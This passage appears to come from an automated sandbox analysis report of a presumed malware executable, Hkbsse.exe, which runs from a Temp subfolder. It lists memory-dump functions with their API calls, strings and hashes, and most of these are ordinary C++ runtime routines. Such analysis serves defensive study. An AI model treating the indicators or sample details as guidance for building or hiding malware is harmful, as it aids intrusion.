Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
String ID: OKB$rKB
API String ID: 3638618822-2616793421
Opcode ID: 72137cbda820330695d694d4acfdcc4a27e9474d8749596f25e61045f2dc6b0c
Instruction ID: 1340b7c3b95eae4a1ab8519dcd624b81f328a7fa145ff03b142a0d068b82aab9
Opcode Fuzzy Hash: 72137cbda820330695d694d4acfdcc4a27e9474d8749596f25e61045f2dc6b0c
Instruction Fuzzy Hash: 0A118271704951ABD709FB22EC52BD9B7A4FF90318F40412FE426435A1EF387955CA88

Function 0043650D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00436502,?,?,004364CA,00000000,00000000,?), ref: 00436522
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00436535
FreeLibrary.KERNEL32(00000000,?,?,00436502,?,?,004364CA,00000000,00000000,?), ref: 00436558

Strings

mscoree.dll, xrefs: 0043651B
CorExitProcess, xrefs: 0043652D

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
Instruction ID: 401d026be5ffeb3a405c3c36e376af9a64225cb0f4d8c4650835087bd389e51f
Opcode Fuzzy Hash: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
Instruction Fuzzy Hash: 03F05E35541219FBCB129B50ED0EB9E7A69AB04756F2040B2B805A12A1CB78CE04DA98

Function 006FDC97 Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ebbf92b61de8fdabddf4bb2b9669c2e1d0f500dd48a019fa951a235035c68e2
Instruction ID: 0bf3c20d6c0221f6a38c055011273409c4e3e51bc001ca23466dd5cf4def6ce0
Opcode Fuzzy Hash: 3ebbf92b61de8fdabddf4bb2b9669c2e1d0f500dd48a019fa951a235035c68e2
Instruction Fuzzy Hash: 336191B0D04758EBDB20DF64CD49BA9B7F8EF04304F1083AAE90DA7291EB75A941CB55

Function 0071DD37 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0071DD6B

Part of subcall function 00719136: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00719157

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0071DDCA
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0071DDF0
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0071DE10
Concurrency::location::_Assign.LIBCMT ref: 0071DE5D

Part of subcall function 00721536: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 0072157B

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
String ID:
API String ID: 1879022333-0
Opcode ID: f5c14901273251154764a76b44e3b76d96a1a4ea67582a1e6a4f4a2fb9e6b1ec
Instruction ID: fe3c13dda6ba868f1fc874e0cb12c98ab9cdf969a7a8814a6640cd8f8de657ab
Opcode Fuzzy Hash: f5c14901273251154764a76b44e3b76d96a1a4ea67582a1e6a4f4a2fb9e6b1ec
Instruction Fuzzy Hash: 0E41E971700210EBCF399B68C88ABEEBB75AF55710F044199E5069B3C2DB38AD85CB91

Function 0070EEED Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0070EEF4
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0070EF1E

Part of subcall function 0070F5E4: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0070F601

Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0070EF9B
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0070EFCD
__freea.LIBCMT ref: 0070EFF3

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
String ID:
API String ID: 2497068736-0
Opcode ID: 93ce5f58012892b0e6dbecc93140a65fa9373db8bd9ad52c9fda59375bb47559
Instruction ID: 8f9bef6553fcd629317ff28bdf506ce344f82c0a3e5c33874df1e518625b542c
Opcode Fuzzy Hash: 93ce5f58012892b0e6dbecc93140a65fa9373db8bd9ad52c9fda59375bb47559
Instruction Fuzzy Hash: AD318DB1A00206CBCB54DFA8C9416ADB7F5AF08314B25466AE405EB3D1DB78AD02CBA1

Function 00428669 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0042868E

Part of subcall function 0041EA70: _SpinWait.LIBCONCRT ref: 0041EA88

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 004286A2
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004286D4
List.LIBCMT ref: 00428757
List.LIBCMT ref: 00428766

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 660398a7946df9d1abeb6bfacc2067e3bef07dd929885e79fda47ff7578b1cd6
Instruction ID: 0cfe79190a9cc40c49ef8cea695a92ff63859d9b7455348f45121259b9f82a47
Opcode Fuzzy Hash: 660398a7946df9d1abeb6bfacc2067e3bef07dd929885e79fda47ff7578b1cd6
Instruction Fuzzy Hash: BE318872E02665DFCB14EFA5E5916EDB7B0BF50308F94406FD80167692CB396D08CB98

Function 0071756B Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 007175B7
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 007175F9
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00717615
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00717620
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00717647

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID:
API String ID: 3897347962-0
Opcode ID: c9bcc653dc57cc8557a221489ebf6a882272b6724b07de11919b806ce84109fb
Instruction ID: 3555a078223c753fceb9cc07232673cfd961f5b4642db6bd3373421c74ce735c
Opcode Fuzzy Hash: c9bcc653dc57cc8557a221489ebf6a882272b6724b07de11919b806ce84109fb
Instruction Fuzzy Hash: 4C217374A00608EFCB04EF6DC499AEDB7B5BF45314F1040A9E905A72D2DB38AE81CF50

Function 0072F1D1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0072F1E9

Part of subcall function 0072AF8C: HeapFree.KERNEL32(00000000,00000000,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?), ref: 0072AFA2
Part of subcall function 0072AF8C: GetLastError.KERNEL32(?,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?,?), ref: 0072AFB4

_free.LIBCMT ref: 0072F1FB
_free.LIBCMT ref: 0072F20D
_free.LIBCMT ref: 0072F21F
_free.LIBCMT ref: 0072F231

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction ID: 4437005c9d778fb2507d80c1340d18b9999ded219560823b177629895fb8a170
Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction Fuzzy Hash: CEF0FF72509624FB8624EB54FB86C1A77E9FB01711B540829F048E7551D77CFC818655

Function 00402670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00402806
___std_exception_destroy.LIBVCRUNTIME ref: 004028A0

Strings

P#@, xrefs: 004027BE, 00402899
P#@, xrefs: 00402811

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#@$P#@
API String ID: 2970364248-3974838576
Opcode ID: 01696c440ea7889561ee094f8eb84884009dcca3c429abe83fcf7a3b5696a8df
Instruction ID: 621a5324c1990eb49072827d514ee072234b508546a45b831640ce9d6ee5fe91
Opcode Fuzzy Hash: 01696c440ea7889561ee094f8eb84884009dcca3c429abe83fcf7a3b5696a8df
Instruction Fuzzy Hash: FD717371D002089BDB05DF98C985BDDFBB5EF59314F14822EE805B7381D778A984CBA9

Function 0072DBB5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0072DD4F

Strings

*?, xrefs: 0072DBF8

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 8362f50ee7a0c99abd3a2154eed41d243f49012955aee066503b94f7d3a93432
Instruction ID: 225a3433f547b4a802529ca7f0009269f29bbfa8007bdff4f0b37eb73760831f
Opcode Fuzzy Hash: 8362f50ee7a0c99abd3a2154eed41d243f49012955aee066503b94f7d3a93432
Instruction Fuzzy Hash: E76130B5E00229AFDB25DFA8D8815EDFBF5EF48310B15416AE815E7300D679AE41CB90

Function 007291B1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe, xrefs: 007291F4, 00729231
P6w, xrefs: 00729202

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe$P6w
API String ID: 0-2141377521
Opcode ID: 1819a519338603fc7a3a4cafba9d2478ec600322c93fbf645a545271b830ca02
Instruction ID: 894c09828479b68d6ae76e37ec6b0befa4b4671ff5bc2d4a5a7388f391dd2d7f
Opcode Fuzzy Hash: 1819a519338603fc7a3a4cafba9d2478ec600322c93fbf645a545271b830ca02
Instruction Fuzzy Hash: 9E419371E00224FBCB15DF99EC8599EBBF8FB94310F18006AE604E7251E7B89A40CB65

Function 00725862 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00725887
CatchIt.LIBVCRUNTIME ref: 0072596D

Strings

MOC, xrefs: 00725899
RCC, xrefs: 007258A1

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
Instruction ID: 2b791cbdea8ce5cd5c0fb2c9bd5a4e4520f72a54ffcfdebc9733aeb1e6277d60
Opcode Fuzzy Hash: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
Instruction Fuzzy Hash: B7419D71900619EFCF15DF98EC85AEEBBB5FF08310F148159F914A7221D339AA90DB50

Function 007329E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00732A57
_free.LIBCMT ref: 00732AAD

Part of subcall function 00732889: _free.LIBCMT ref: 007328E1
Part of subcall function 00732889: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 007328F3

Strings

XgE, xrefs: 00732A10

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE
API String ID: 597776487-2984570469
Opcode ID: 13dff872d4da3940e7f7c2aad926b40bfead4e65e52a482af211b715217b11d5
Instruction ID: 3c8847dd5c3f075a65929817fd3e9a5ff72b9b3a386acc10d605292e7805a572
Opcode Fuzzy Hash: 13dff872d4da3940e7f7c2aad926b40bfead4e65e52a482af211b715217b11d5
Instruction Fuzzy Hash: 86213872800129A7E734A7249D45AEB77A88F80360F2143A5ED94B3093EF7C8D878591

Function 00710E63 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00710ED1
Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00710EDE
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00710F31

Strings

@[F, xrefs: 00710ED6

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::Reentrant
String ID: @[F
API String ID: 220083066-1227568360
Opcode ID: e96e0449b761905d3e20a47db03eaa49534ecb05729d0eb96170e707f80b5347
Instruction ID: 680281854af8acdcecb260bc04185eafe1d4de95bf0a628f55721b1509cc743d
Opcode Fuzzy Hash: e96e0449b761905d3e20a47db03eaa49534ecb05729d0eb96170e707f80b5347
Instruction Fuzzy Hash: 40019260905305DADB21ABFC554A29E76E4AB08704F50016EF405EB2C2EAFC8EC287DA

Function 0042A08E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A0A2
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A0C6
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A0D9

Strings

pScheduler, xrefs: 0042A0D1

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: bf9eedd6d08349130202fb79981dd2f85bb67ee231afbe994dfa5c9f2b7b4f6f
Instruction ID: db3404021c9b453a332318ff192eee56eaec823d92bc0efffc062d04c8b945cf
Opcode Fuzzy Hash: bf9eedd6d08349130202fb79981dd2f85bb67ee231afbe994dfa5c9f2b7b4f6f
Instruction Fuzzy Hash: 89F02B3670021463C320FF51F84295EB3799F807157A0801FE90153243DF79AD05C69A

Function 0070D3A2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL(00465720), ref: 0070D3CF
WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,0070D33F,00000064,?,0045007C,?,006F7764,00468650), ref: 0070D3E0
RtlEnterCriticalSection.NTDLL(00465720), ref: 0070D3E7

Strings

WF, xrefs: 0070D3C9

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWait
String ID: WF
API String ID: 501323975-2907287748
Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
Instruction ID: 8b2abea5aa2a6cf2f1664a1c5658bdecb778ab4bcd398fd0c6aaa9b355e4abbf
Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
Instruction Fuzzy Hash: C6E01239541B24F7CB112B90FC48B8E7F58EB09753F144031F905961A1D7655C009BEF

Function 0072CC87 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0072CD0E

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 75912d319fd4d84a463179a52f4d0c7b8a22aeda22330244694e99d83a1ca41b
Instruction ID: 4f4a98cded222651364b0635582a535452bcd583d2b7b661781d34258da5048e
Opcode Fuzzy Hash: 75912d319fd4d84a463179a52f4d0c7b8a22aeda22330244694e99d83a1ca41b
Instruction Fuzzy Hash: 6EB16A32E002A59FDB12CF28D8817BEBBF6EF65340F1541A9E455DB242D63C8D01CB60

Function 0043CA20 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0043CAA7

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 1993e3bc1e35a4ca9142e6cfe781145fb0807b3e986debb763c412fc433ec638
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 03B126329002559FEB15DF28C8C17AEBBE5EF59350F24A16BE845EB341D63C9D02CB68

Function 00725255 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0072531C
___AdjustPointer.LIBCMT ref: 0072533F
___AdjustPointer.LIBCMT ref: 007253DB

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e6df1cbf7e104fe9de3839c683bd27944cab602863a2b4ede0c4ef708695de88
Instruction ID: 688e690d71f00e6bedc9085ac159dd71565404c712d9719f019a88dbb9e085b7
Opcode Fuzzy Hash: e6df1cbf7e104fe9de3839c683bd27944cab602863a2b4ede0c4ef708695de88
Instruction Fuzzy Hash: 7951E3B1600A26DFDB28DF50E849B6A77A4FF10355F24452DEC01972A2E779ED80CB90

Function 00724E1C Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00724E6D
TypeidsEqual.LIBVCRUNTIME ref: 00724E92
PMDtoOffset.LIBCMT ref: 00724EA8
PMDtoOffset.LIBCMT ref: 00724F29

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: c005505a0713435821426e91791c59f5f300f8d85821ddb4af4595d168dc954a
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: 6051BC35D042299FDF11CF68E680AAEFBF4FF95314F19048AE850A7351D73AA9048B50

Function 006F30E7 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 006F3186
GetCurrentThreadId.KERNEL32 ref: 006F31A5
__Mtx_unlock.LIBCPMT ref: 006F31F3
__Cnd_broadcast.LIBCPMT ref: 006F320A

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: d30519bd5c2df52d2b7e00916fd9a19252df00da1a9962264354fb1a93633b2f
Instruction ID: eb1a64368cc5627ac9b56d40e0171f1eca64d6dabc2d194e00811af804da77e3
Opcode Fuzzy Hash: d30519bd5c2df52d2b7e00916fd9a19252df00da1a9962264354fb1a93633b2f
Instruction Fuzzy Hash: 9641B0B0900629DBDB21DF74C9497AAB7E8FF15314F008629E919D7791EB38EB04CB81

Function 00736165 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00736235
_free.LIBCMT ref: 0073625E
SetEndOfFile.KERNEL32(00000000,00731BA1,00000000,0072AE29,?,?,?,?,?,?,?,00731BA1,0072AE29,00000000), ref: 00736290
GetLastError.KERNEL32(?,?,?,?,?,?,?,00731BA1,0072AE29,00000000,?,?,?,?,00000000), ref: 007362AC

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: a64735c92fc1d7e95804ed15c563a6c46c005c7e2516181bfeef1488fef70a72
Instruction ID: eba166e28fa991b517083121a59ea8f447e638864a2984e90669dbed6c08c21e
Opcode Fuzzy Hash: a64735c92fc1d7e95804ed15c563a6c46c005c7e2516181bfeef1488fef70a72
Instruction Fuzzy Hash: BB41D172900615FBEB21ABB8DD4AB9E3775FF45320F268510F914E72A3EA3CD8508761

Function 00721D2D Relevance: 6.1, APIs: 4, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00721D46

Part of subcall function 00722015: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00721A8E), ref: 00722025

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00721D5B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00721D6A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00721E2E

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID:
API String ID: 1312548968-0
Opcode ID: f8db278b2be702a89df8ee59d0553bbb71f604d75d9491b350bbaf38b79f034c
Instruction ID: 0ce0c972565d58076181a2abf8efb7aa18ab2547486d02ed9f3eba82587539ae
Opcode Fuzzy Hash: f8db278b2be702a89df8ee59d0553bbb71f604d75d9491b350bbaf38b79f034c
Instruction Fuzzy Hash: 7B31F835B00224EBCF05EF68E885E6D77B9BF54310F614569EC119B292DB78EE01C790

Function 00712F03 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00712F16

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 07249c23c52b0010c3fd87b1c68d2ca0ee0db9b0017b923e638e4ded83c67244
Instruction ID: bec98c59662c23208646403f6cd58b0c9df5f2048e599843f9674852f61546aa
Opcode Fuzzy Hash: 07249c23c52b0010c3fd87b1c68d2ca0ee0db9b0017b923e638e4ded83c67244
Instruction Fuzzy Hash: F5315C75A00309EFCF10DF58C4C4AEE7BB9BF44354F1004A9E901AB386D774AA96CB91

Function 0072DAE6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00726BD3: _free.LIBCMT ref: 00726BE1

Part of subcall function 0072EABD: WideCharToMultiByte.KERNEL32(006F8877,00000000,0045FB78,00000000,006F8877,006F8877,007307E6,?,0045FB78,?,00000000,?,00730555,0000FDE9,00000000,?), ref: 0072EB5F

GetLastError.KERNEL32 ref: 0072DB4E
__dosmaperr.LIBCMT ref: 0072DB55
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0072DB94
__dosmaperr.LIBCMT ref: 0072DB9B

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
